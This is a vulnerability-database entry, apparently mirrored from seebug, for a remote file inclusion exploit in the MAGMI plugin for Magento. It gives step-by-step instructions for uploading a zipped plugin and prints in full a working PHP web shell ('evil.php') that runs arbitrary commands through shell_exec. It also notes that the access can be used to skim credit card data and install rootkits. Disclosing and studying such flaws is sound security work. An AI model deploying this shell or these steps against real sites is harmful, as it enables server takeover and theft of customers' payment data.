Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Magento Server MAGMI Plugin - Remote File Inclusion (RFI)

🗓️ 13 Nov 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 42 Views

Magento Server MAGMI Plugin - Remote File Inclusion (RFI) vulnerability, allowing attacker to execute remote commands and skim credit card data

Code

                                                Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Bhasin
Contact info:  [email protected]
twitter:  @parvinderb - scorpio
 
Currently tested version:
Magento version:  Magento CE - 1.8 older
MAGMI version: v0.7.17a older
 
Download software link:
Magento server:  http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/
 
MAGMI (MAGento Mass Importer) suffers from File inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks).  This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files..etc.  Essentially,
this gives attacker ability to execute remote commands on the vulnerable
server.
 
 
Steps to reproduce:
 
1.  http://<a magentosite.com>/magmi/web/magmi.php
2.  Under upload new plugins:
click on "choose file"
MAGento plugins are basically php file zipped.  So create a php shell and
zip the file. ex: evil.php  ex: zip file: evil_plugin.zip.  After the file
has been uploaded, it will say:  Plugin packaged installed.
 evil.php:
 
 <?php
if (isset($_POST['command'])){
echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";
 
    if(function_exists('shell_exec')) {
    $command=$_POST['command'];
    $output = shell_exec("$command");
    echo "<pre>$output</pre>";
   }
}
else {
  echo "<form action='evil.php' method='post'>
      <input type='text' name='command' value=''/>
      <input type='submit' value='execute'/>
      </form>";
}
?>
 
3.  Your malicious evil.php file is extracted now.  All you then need to do
is just access the evil.php page from:
http://<amagentosite.com>/magmi/plugins/evil.php
 At this point you could really have access to the entire system.  Download
any malware, install rootkits, skim credit card data ..etc.etc.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Nov 2014 00:00Current
7.1High risk
Vulners AI Score7.1
magentomagmiremote file inclusionrfivulnerabilityattackerexecute remote commandscredit card datasecurity threat
42